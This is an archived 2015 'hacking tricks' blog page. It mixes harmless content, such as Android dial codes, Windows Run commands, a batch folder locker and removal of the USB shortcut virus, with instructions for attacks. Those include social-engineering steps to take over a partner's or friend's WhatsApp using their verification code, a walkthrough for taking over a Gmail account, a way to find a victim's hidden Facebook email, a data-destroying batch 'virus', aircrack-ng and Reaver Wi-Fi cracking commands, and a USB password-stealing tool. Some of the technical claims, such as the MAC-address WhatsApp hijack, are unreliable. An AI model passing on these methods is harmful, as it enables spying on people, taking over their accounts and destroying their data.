Wednesday, 11 November 2015

AIRTEL 3G/4G FREE INTERNET TRICK


Airtel Free Internet Tricks 3G/4G [ All India] November - December 2015-2016

Lets Start ->

#Method-1 :-

*.Goto Message
*.TypeTRY3G
*.Sent It to51619
*.You’ll Get Confirmation Sms From Airtel Shortly
*.BoooM, Enjoy
Method-2 :
*.Call to129
*.Select Your Language
*.You’ll Be Asked to Activate 3G Platinum Trial Pack Worth 100 MB *.Press 1 and Confirm It
*.Great ! You’ll Get a Confirmation Sms

ENJOY !!



So above is all about AIRTEL FREE INTERNET TRICK OF 2016 4G AND 3G if you have any query then comment below !!

Tuesday, 10 November 2015

Android's SECRET Codes 2015 Latest Edition

These Android Secret codes are mostly universal, and should work on Android devices, no matter the manufacturer. There might still be carrier restrictions on certain codes though, so they're not all guaranteed to work.

Android Secret/Hidden codes 2015 :-

 *#06# - IMEI (International Mobile Station Equipment Identity) number - essential in case your device is stolen and you want to block the thief from accessing your network

 *#*#7594#*#* - Make Power button turn off your device without displaying menu

*#*#4636#*#* - Display information about phone, battery, usage and WiFi

*#*#7780#*#* - Factory reset (deletes app data and apps, not firmware)

*2767*3855# - Complete phone wipe, including firmware (not to be used lightly!)

*#*#273283*255*663282*#*#* - Back up all your photos and videos
*#*#1472365#*#* - Test your GPS
*#*#1234#*#* - Display phone firmware and PDA info


You can access the above screen on most Android devices by entering *#*#4636#*#* on the dialpad.

*#*#232338#*#* - Show WiFi Mac address
*#*#8255#*#* - Access GTalk Service Monitor
*#*#36245#*#* - Access Email debug info Email
*#*#225#*#* - Events calendar
*#*#426#*#* - Debug info for Google Play Service
*#*#759#*#* - Access Google Partner Setup

#Samsung SECRET Codes :-
*#*#34971539#*#* - Show all camera information
*#*#197328640#*#* - Enable test mode for services
*#*#232339#*#* - Wireless LAN test
*#*#1575#*#* - Test your GPS (alternative to generic Android GPS test)
*#*#0*#*#* - Test your LCD display
*#*#4986*2650468#*#* - Display crucial phone information (PDA, Hardware, firmware etc.)
##778 (followed by the Call button) - EPST menu
#HTC SECRET Codes New :-
*#*#3424#*#* - HTC function test Program
*#*# - HTC Info menu
*#*#8255#*#* - Launch GTalk Service Monitor
##3424# - Diagnostic mode
##3282# - EPST menu
##8626337# - VOCODER
##33284# - Field trial menu
##786# - Reverse Logistics Support
##7738# - Protocol Revision



The function test menu on HTC phones can be accessed by typing ##3282# on the dialpad

These codes, but if you do then now you know where to find Them. So Above Is the Android SECRET Codes Latest Edition By Dhruv hacks.

Types of hackers


TYPES OF HACKERS

Hackers are three types:-

1.    White hat hacker

2.    Gray hat hacker

3.    Black hat hacker

White Hat and Grey Hat Hacker & What is the Real Difference?


What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.

So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.

White Hat Hacker


A hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.

In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent machines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.

Publish computer, they can exploit their capabilities found a new circle. They were not limited to the constraints of the physical world, instead, they can travel through the virtual world of computers. Before the Internet, interaction and exchange of information for the Bulletin Board System (BBS) is used. When the Internet appeared, however, real explosion occurred.

Today, anyone can become a hacker. Within that value, are three types of hackers. Also known as the black hacker, cracker to obtain personal benefits in criminal activities is someone who uses his computer knowledge. A typical example of a financial institution to make some money on the exploitation of the weaknesses of the system is one.

The white hat hacker. White hat hacking can be considered like a black hacker, though, a significant difference. A white hacker does with any criminal intent. , Their system testing white hackers who want to contract companies worldwide. They test how secure their systems, and they could be found that would indicate any faults. You want to be a hacker with a white cap, Linux, a PC and an Internet connection is all you need.

Grey Hat Hackers


A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.

For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime.

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers.

If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, reunite and meet at DEF CON. These conventions are much concurred. In the last one, 6,600 people attended it.

Each year, Def Which Las Vegas, Nevada is observed. However, hackers are not the only ones who go to this event. Computer media, computer security experts, lawyers, and government employees are also.The Hacker (computer security, worms, viruses, new technologies, coding, etc.) in the world, somehow, all of them related, is composed by different kinds of tracks. Besides tracks, computer hacking, lockpicking and even robots that related events are compared. Around the world, public or private institutions, to protect the system: in the end, you want to use ethical hacking, white hat hacking or whatever the name, it has a purpose. After all, hackers can now be located anywhere, and they can be counted by millions. Soon, white hat, white hat concepts like the Linux operating system or will be common knowledge. A true testament to how much our society has been affected by technology.

Black Hat Hackers


Black hat hackers all over the world have become the iconic image of hackers. For the majority of computer users, the word hacker social misfits and criminals has become a synonym for.

Of course, the media is an injustice created by their interpretation, so a hacker and a black hacker (or cracker) is what is important to learn. Therefore, the black hat techniques and how they make our life a little more difficult to learn two.

With malicious intent who breaks into computer systems or networks (you prefer cracker, or) black hat hacker is used to describe. A white hat hacker contrast, black hat hacker probably destroying files or stealing data for the purpose, takes advantage of the break. Black Hat hacker victim without notifying other hackers and / or known to the public can exploit. The other organization is able to secure it offers the opportunity to exploit the vulnerability.

Folder Lock With Password Without Any Software-



Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.


if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Sunday, 8 November 2015

How To View Facebook Private Profile Photo In Large Size ?



How To View Facebook Private Profile Photo In Large Size ?

Sometime you want to see clear image of someone on facebook who might not be your friend but his/her privacy setting stop you from doing this. In this tutorial i will teach you to view facebook private or locked profile picture in large size with very simple trick. How To View Facebook Locked Profile Picture ?
1. Open the facebook profile of person whose profile picture is locked or is set to private.
2. Right click on the profile picture and click on Copy Image Url as shown in image below.

3. Open that image in new tab by right clicking and selecting Paste (CTRL + V) 4. Now change the value of image size highlighted below which might be s160x160 to s720x720 (If its not clear try (s320x320)
5. The image will enlarge in size. This trick does not always work

Saturday, 7 November 2015

HOW TO SPOOF YOUR MAC ADDRESS IN ANDROID




REQUIREMENTS

1) ROOTED PHONE
2) BUSYBOX INSTALLED
3) Terminal App

OPEN UP TERMINAL AND WRITE

:su
:busybox iplink show eth0

(THIS WILL SHOW YOUR CURRENT MAC ADDRESS)

NOW TYPE IN

:busybox ifconfig eth0 hw ether 00:11:22:33:44:55

(INSTEAD OF 00:11:22:33:44:55, YOU CAN WRITE YOUR WANTED ADDRESS)




CONGRATULATION, YOU HAVE SUCCESSFULLY SPOOFED YOUR MAC ADDRESS!

YOU CAN CHECK YOUR MAC ADDRESS BY TYPING

:busybox iplink show eth0


PS: I CANT GUARANTEE YOU, IF THIS WORKS . BUT IT SHOULD WORK IF YOU GOT BUSYBOX INSTALLED.

Mac Address Spoof - http://www.mediafire.com/?qapodo05oc1im06

How to Hack WhatsApp Account???



WhatsApp is currently one of the most secure messaging services purely because it works with a particular phone number and requires a certain code. In my today’s article I am going to describe a few methods to hack WhatsApp account. Yes guys, it’s no more a myth. You can actually get access to someone else’s WhatsApp account. If you always wanted to know what your boyfriend/husband or girlfriend/wife or friend talks to on WhatsApp then you are at the right place. There are loads of other websites that claim they can hack WhatsApp account, all of them are false. None of those tricks work and actually it is nothing but just a waste of time. The methods that I am going to depict will surely help you in getting access of someone else’s whatsApp account. So people, lets get started now.
Method 1:- Social Engineering (Recommended)
NOTE:- THIS HACK ONLY WOULD WORK WITH SOMEBODY YOU KNOW OR ARE FRIENDS WITH.
Step 1: Firstly you will need to download Bluestacks.
Step 2: For this to work, a little Social Engineering is required. Using this software you would need to download and open up the whatsapp application.
Step 3:- Now enter the Phone number of your victim. WhatsApp will send a confirmation code on victims number. You are in need of that code.
Step 4: The best method to get this code off your friend is to start a conversation with him. All you have to do is trick him into giving the code. You could try this:-
“You – Hey, I got a reactivation code for my WhatsApp, did you get one too?
Victim – Yeah I did!
You – I accidentally deleted mine, might be worth a shot to try yours”
The victim hopefully gives you the code.
In the event that they don’t, might be worth trying to physically get hold of their phone or try from a different tactic. Try and get it from them without making it too obvious.
People can be stupid. This is a guaranteed method if you manage to complete the steps above.
NOTE: This method doesn’t work twice so know what you’re going to say and just go in for it. If you fail on one person, move onto the next…You will be able to intercept any messages, videos, images. Virtually anything you want off their WhatsApp!!
Method 2:- Using MAC [Media Access Control] ADDRESS
In this trick i will be telling you how you can read your messages offline with the help of MAC Address. You can see that you can read the messages and see profile picture in your WhatsApp even when you are not connected to internet and it also pop up the messages which you have not read when you were offline. The trick behind this is that all the messages are kept encrypted in the SD card of your mobile phone so even when are offline you can read the messages and see profile picture of your contacts.
In this trick you have to spoof your android phone’s MAC Address. Don’t be surprised!! Yes, MAC Address can be spoofed. The attacker can use your MAC address and verification code to access your whatsapp account.
It is easy to spoof MAC address in android but for spoofing MAC address the device must be rooted with BusyBox and Terminal App must be installed in it. Anyone can spoof their MAC address if they meet all these requirements and eventually can hack WhatsApp account of the victim.
You can learn spoofing MAC Address by going to this link: How to spoof MAC Address.
Now just follow these simple steps:-
Get mac address on your android phone.
Finding MAC address on an Android Phones
On your phone’s home screen, click on menu, then go to setting.
Click on about phone.
Click on the status.
And then view your Wi-Fi MAC address.
As soon the message is received Push the MAC address as well as Verifying code to your server or mail it your ID. That banks on your convince.
Cheat your phone’s MAC address to the Victims address and install WhatsApp and after that type the verify code.
And now its done. You get full access to the victim’s whatsapp ID. So now you can keep spying/watching your victim’s movements.

That means you and the victim is using the same ID from different devices.
WhatsApp hack to use it by not using your number.
This hack works by cheating the WhatsApp Verification Servers by sending a spoofed request for an authorisation code expected for a different phone.
Install Whatsapp on your device. WhatsApp now opens a counter where it sends a verification message to its servers.
Block the message service – it can be blocked by changing the message centre number or turning the phone into Airplane mode.
WhatsApp now gives a substitute method of verification – Select verify through SMS and fill in your email address. Once you click to send the SMS press cancel to abort the call for authorisation to the WhatsApp server.
Now you have to do sms Spoofing.
Examine your outbox and copy the message details into the spoofer application and send the spoofed verification.
You will now receive messages expected for the spoofed number on your mobile device and you can communicate with people under the spoofed number.
It’s done!! You have hacked into your friend’s WhatsApp account.
NOTE:- This information has been shared to create awareness among people regarding the “Ways to Hack Whatsapp” so that you can protect yourself from getting hacked. In no way do i promote misusing of the information.

Make Facebook Multi Id With Singal Email



There is a small bug in gmail because of which it ignores the dot (.) in the e-mail address and hence the following email addresses are same :
M.ultifacebook@gmail.com
M.ultifacebook@gmail.com
Mu.ltifacebook@gmail.com
Multifaceboo.k@gmail.com ...................and so on
It can be done on all email Id's. And the facebook considers these dots (.) in the email ID and hence consider's these to be Different ID's.
So, If you want to create a new facebook account with existing ID then just place the dot (.) in the ID name while signing up.

Delete All Friends Of Facebook




To use in Mozilla follow these step below:

Step 1: You must have Mozilla Firefox and Greasemonkey Addon Installed this
Step 2: Install this script. Clear List Script
Step 3: Restart Mozilla Firefox and open your Facebook.

Step 4: Go to your Timeline, click on Friends.

Step 5: If script has been not loaded, just reload/refresh the tab.

Step 6: Tick on checkbox beside a friend name to select for delete. If you click button "Select All" , it will tick all.
Becareful ! After you click "Delete Selected Friends" it will not be
undone .

To use in Chrome follow these steps below:

Step 1: Install this Extension Tampermonkey  Extension
Step 2: Now, Install this script. Clear List Script

Step 3: Go to your timeline profile, click friends tab and wait script to load.

Step 4: Now, you have an option to do it. If script does not load, just reload/refresh the page/tab.

Change The FaceBook Name Before 60 Days



Facebook only allow you to change your Name after 60 days. You don't be able to Change that. you can change your facebook name before sixty day. Now we have a New Trick. But You Can Set Your
Previous Names Only.

=> Firstly go to
http://m.facebook.com/hacked

=> Now Click on
"MY ACCOUNT IS COMPROMISED"

=> Now login with your account.

=> Facebook asks to change your password and some other security things.

=> In this procedure, it says
"recently you changed your name if you didn't do this?
change name now"

=> Now your previous names will be shown.

=> Choose your old name and click save.

Find victim's hidden email address in facebook


Try this fast & Easy method
Open Your Facebook Account go to "settings"
click general >> Mail Disable Facebook email address
Now Send message to victim
Now open your gmail Account
click "inbox"
select "contacts"
Now it shown recently contacted users
Now Click "victim link" here
It Shows The Mail Id Of Victim...!
ENJOY

How to share Blank Status, Comments and Do Blank Message on Facebook


These type trick also making more interesting this social networking site, Many time you are seeing that people doing blank comments, Blank status updates and also blank messages, So if are you also searching about these type tricks then maybe this post will be useful for you.
To share Blank Status Updates just Post Pres Alt +0173.
To share Blank Comments on Friends stratus Updates Press Alt +0173.
For Mobile just give speeches and Copy space and post on comments and status or @ [0:]
To send Blank messages to your friends Press Alt +0173.

How to recover Deleted Facebook Messages



This trick may be secret for you. If unfortunately if lost your messages and you’re searching to get back these messages again in your inbox, then this trick will be best for you. As I wanna tell you that Facebook our all information saving in archive, And Facebook also allow to download your archive to your computer, Using that we can we can explore our all deleted Facebook message and all conversation back.Let me show complete method about this.
First, you need to go Setting Tab.
Now click on General Tab you will See Download a copy of your data.
Just click on Download a copy option.
You will redirect new Page, just click on Start my Archive.

HOW CAN ANYONE EASILY HACK YOUR GMAIL ID




Friends most of my friends lost there gmail IDs because of hacking.
Don't worry i didn't do that but there are many more who like hacking like me.
But i do not want to be harmful for anyone , i just want to tell the people the way of hacking, How a hacker can hack you? ,

How can you save yourself from them.

So today i'm going to tell you how can you hack anyone gmail id or how can you save your's one?

Just see some simple steps

STEP 1.- First of all , a hacker will try to know you gmail id.

STEP 2.- Now , he'll click on Forget Password on gmail.com . Here he'll fill your email id.

STEP 3.- After that there'll be two option to hack the account , the first one is mobile number and the second one is your alternate email id or your security answer.

STEP 4.- Let assume that you want to hack your friends gmail id or your friends want to hack your gmail id then he'll ask you for your phone for sometime. Once you'll allow him then no one can save your gmail id.
It'll surely going to be hacked. Let me show you in next step how'll he hack your gmail id.

STEP 5.- Now after doing last 4 step, he'll fill your number and click on continue.

STEP 6.- After that google will send a sms on your number with a code and when he'll fill that code there then google will show you a page to set a new password.
Now he'll set new password. A confirmation mail will be sent to your atlernative email id.

But he'll do something wrong that will explained in next step.

STEP 7.- Now he'll go to ACCOUNT section and change the recovery option. E.g. He'll replace your number with his private number and also change your alternative email with his email

STEP 8.- Now he'll come to you, and give your phone to you and say thanks with a smiling face and you know what'll you say ?

You'll say - your welcome, its my pleasure. . Ha ha ha. . So next time , think 100 times before giving your phone to your friends.

" ENJOY & WAIT FOR NEXT "

Commands That Every Windows User Should Know 2015



1. services.msc
When you enter “services.msc” and press the Enter button, it will open up the Windows Services app where you can easily start, stop and configure other settings for each and every service individually. It’s quite helpful when you want to toggle a service.
2. mstsc
Entering “mstsc” into the Run dialog box opens the Remote Desktop Connection app which allows you to connect to another Windows computer over the local network or through the Internet. This helps you to use the host computer as if your own.
3. msinfo32
If you want to quickly get your system information, then the “msinfo32″ command is the way to go. At a glance, it will display all the system details including the hardware resources and software environment.
4. sdclt
This command opens the Backup and Restore window which allows you to quickly set a backup schedule or restore any of your previous backups.
5. compmgmt.msc
The Computer Management app is where you can access almost all the advanced Windows modules like Event Viewer, Shared Folder, System Tools, etc.
6. cleanmgr
This command allows you to open the Windows Disk Cleanup utility. Once opened, simply select the drive your want to clean up and click on the “Ok” button.
7. eventvwr.msc
Windows Event Viewer is where Windows stores all the monitoring and troubleshooting messages. You can use this command to quickly access the Event Viewer application.
8. control
Every Windows user knows a thing or two about the Windows Control Panel, and using this command, you can quickly access the Control Panel with some stumbling around.
9. mmc
Microsoft Management Console (MMC) is an advanced Windows module which is mainly aimed at system administrators and power users as it sports all the tools required for configuring and monitoring a Windows system.
10. resmon
Whenever you want to check how your system resources are being utilized, simply use this run command, and it displays everything from your CPU to Dist to Network.
11. desk.cpl
Want to quickly change your screen resolution? Simply enter this command in the Run dialog box and you are good to go.
12. snippingtool
Snipping tool is a very useful tool if you want to take quick snapshots. This lightweight tool even comes with its own basic image editor so that you can make necessary modifications to the snapshot.
13. taskmgr
Access the Windows Task Manager by right-clicking on the taskbar and selecting the option “Task Manager.” But another quick way is to type this command in the Run Dialog box.
14. main.cpl
Mouse properties are generally buried deep inside the Windows Control Panel, but you can easily access the same using this Run command.
15. psr
Problem Steps Recorder (PSR) is a great utility to record and show a certain problem in Windows. Just use this simple command to access the tool.
16. “chrome” or “firefox”
If you’ve installed Chrome or Firefox, you can easily launch those programs by entering these commands. Of course, you can launch any registered Windows program this way (ex: notepad).
17. wscui.cpl
Using this simple Run command, you can access the Windows Action Center without stumbling around or messing with the Windows Control Panel.
That’s all for now, and hopefully that helps.

Friday, 6 November 2015

Make A Very Dangerous Computer Virus In Notepad



Virus that format C: Drive:
1. Open Notepad and copy below code into it.
@Echo off
Del C: *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive..

How To Change Windows password wihout knowing current password



Hello guys, you know that User and Administrator password in windows are protecting your computer from any unauthorized access. So that chooses a strong password and safe your computer or system files from unauthorized access. But if you forget your windows login password, or want to change your password without knowing current or old password ,then don’t worry , In this we are telling about to change windows login password with a some simple method, which you can do easily perform.
Method -1
Step-1 Select “My computer” and press Right click on it and chose a “Manage” options. or Press Windows+R Key and type compmgmt.msc in Run Box and hit enter.
Step-2 "Computer Management windows" will open, and Select System Tools from Right window pane and after that Go to "Local Users and Groups" and double click on it.
Step-3 Now Click on "Users" and you will see all the login accounts of your computer. And after that select your account.
Step-4 After selecting your login Account press Right Click on it. And then choose "Set Password" option.After that one pop-up box will open and click on "Proceed".
Step-5 Enter the New Password and conform them, then click on "OK" Button.
Step-6 Now your login Password has been successfully changed .you can restart your system and check with your new password.
Method -2
Change password with "Command Prompt"
Step-1 Firstly go to windows start menu and type "cmd" in search box . Then select cmd and Run as Administrator.
Step-2 After that type below command in cmd
net user %username% DhruvHackingTricks
you can change "DhruvHackingTricks" to with your choice password and after that hit enter.
Now your password have been successfully changed . and enjoy !!

How to Hack Wi Fi Using Android



Do you want to test your network security? It used to be that you needed a desktop OS such as Windows or Linux installed on a computer with a specific wireless network card. Now, however, you can also use certain Android devices to scan and crack wireless networks. These tools are available for free as long as your device is compatible. Hacking routers without permission is illegal. These steps are provided to test the security of your own network.
I will tell you two methods to hack wifi
1. WEP Routers
2.WPA2 WPS Routers
************************************

WEP Routers

1.Root a compatible device. Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:
Nexus 7
Galaxy S1/S2/S3/S4/S5
Galaxy y
Nexus One
Desire HD
Micromax A67
2.Download and install Bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website.
To install an APK file, you will need to allow installation from unknown sources in your Security menu.
3.Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported.
Your device must be rooted in order to run bcmon.
4.Tap "Run bcmon terminal". This will launch a terminal similar to most Linux terminals.Type airodump-ng and tap the Enter button. AIrdump will load, and you will be taken to the command prompt again. Type airodump-ng wlan0 and tap the Enter button.
5.Identify the access point you want to crack. You will see a list of available access points. You must select am access point that is using WEP encryption.
6.Note the MAC address that appears. This is the MAC address for the router. Make sure that you have the right one if there are multiple routers listed. Jot this MAC address down.
Also note the Channel that the access point is broadcasting on.
7.Start scanning the channel. You will need to collect information from the access point for several hours before you can attempt to crack the password. Type airodump-ng -c channel# --bssid MAC address -w output ath0 and tap Enter. Airodump will begin scanning. You can leave the device for a while as it scans for information. Be sure to plug it in if you are running low on battery.
Replace channel# with the channel number the access point is broadcasting on (e.g. 6).
Replace MAC address with the MAC address of the router (e.g 00:0a:95:9d:68:16)
Keep scanning until you reach at least 20,000-30,000 packets.
8.Crack the password. Once you have a suitable number of packets, you can start attempting to crack the password . Return to the terminal and type aircrack-ng output*.cap and tap Enter.
9.Note the hexadecimal password when finished. After the cracking process is complete (which could take several hours), the message Key Found! will appear, followed by the key in hexadecimal form. Make sure that "Probability" is 100% or the key will not work.
When you enter the key, enter it without the ":". For example, if the key was 12:34:56:78:90, you would enter 1234567890.

WPA2 WPS Routers

1.Root a compatible device. Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:
Nexus 7
Galaxy Ace/S1/S2/S3
Nexus One
Desire HD
2.Download and install Bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website.
To install an APK file, you will need to allow installation from unknown sources in your Security menu.
3.Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported.
Your device must be rooted in order to run bcmon.
4.Download and install Reaver. Reaver is a program developed to crack the WPS PIN in order to retrieve the WPA2 passphrase. The Reaver APK can be downloaded from the QR code that i provided below.

5.Launch Reaver. Tap the Reaver for Android icon in your App drawer. After confirming that you are not using it for illegal purposes, Reaver will scan for available access points. Tap the access point you want to crack to continue.
You may need to verify Monitor Mode before proceeding. If this is the case, bcmon will open again.
The access point you select must accept WPS authentication. Not all routers support this.
6.Verify your settings. In most cases you can leave the settings that appear at their default. Make sure that the "Automatic advanced settings" box is checked.
7.Start the cracking process. Tap the "Start attack" button at the bottom of the Reaver Settings menu. The monitor will open and you will see the results of the ongoing crack displayed.
Cracking WPS can take anywhere from 2-10+ hours to complete, and it is not always successful.
I think I have cleared all the doubts, if there is still any doubt just comment below.

How to Remove Shortcut Virus From USB and Memory Card



Now a day’s Pen drives and Memory cards are the most used devices to transfer data such as movies , songs , documents etc but often storage devices are infected by shortcut virus. If you connect your infected Pen drive to your system it will show files and folders having shortcuts. And in case you open the shortcut fie or folder it would infect your whole system badly. This post will help you to remove shortcut virus from pendrive/USB and Memory card and recover the files.

To remove the shortcut virus use the following steps.
Do not open the shortcut file or folder otherwise the virus could infect your system.

Step 1: Connect your Pen drive or memory card.
Step 2: Open command prompt. To open command prompt press windows button + R . Enter the command cmd in Run and press enter to open command prompt.
Step 3: Go to My computer and check out your Pen drive letter.
Step 4:To remove shortcut virus from pendrive type attrib -h -r -s /s /d g:\*.* in the Command prompt. Don’t forget to replace the g with your Pen drive or memory card letter.
Step 5: Press Enter button.
Step 6: Go back to your Pen drive or memory card. You would see both your original files and shortcut files.Delete all the shortcut and unknown files and copy your original files and folders to another drive.
Step 7: At last format the Pen drive or Memory card. You have successfully remove shortcut virus from pendrive and recovered the infected files in the Pen drive.

Tips to protect your pen drive from Virus
Keep your system up to date with the latest antivirus.
Update your antivirus program at regular interval of time.
Do not ever open the shortcut or virus file with the extension filename.lnk . it could badly harm your computer and could infect your other removable devices too.
Before opening any removable drive ( pen drive or SD card ) perform a deep scan of the removable drive.
Leave your valuable comments and if you find any difficulty in removing shortcut virus from Pendrive tell me i will help you.

Create A Undeletable And Unrenamable Folders In Windows



In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.
How To Create Undeletable And Unrenamable Folders ?
1.Go to Start and then Click on Run
2.Type cmd & hit enter (To open Command Prompt ).
Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
3.Type D: or E: and hit enter
4.Type md con\ and hit enter (md - make directory)
5.You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
6.Open that directory, you will see the folder created of name con.
7.Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?
It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
Open Command Prompt Type D: ( if u created this type of folder in D: drive) & hit enter Type rd con\ (rd - remove directory) Open that directory and the folder will not appear because it is removed.

Hack A Pc With Pen drive





Hacking passwords or any information using USB(pendrives).Here is the small tricks guys for stealing information or passwords of ur friends or enemies using pendrives...

USB Switch Blade

Extract it. Open PcInfo select all the files and paste it in your USB(pendrive) insert it in the pc you wanna hack...Open the USB drive, give it 2 sec and and ur job is done...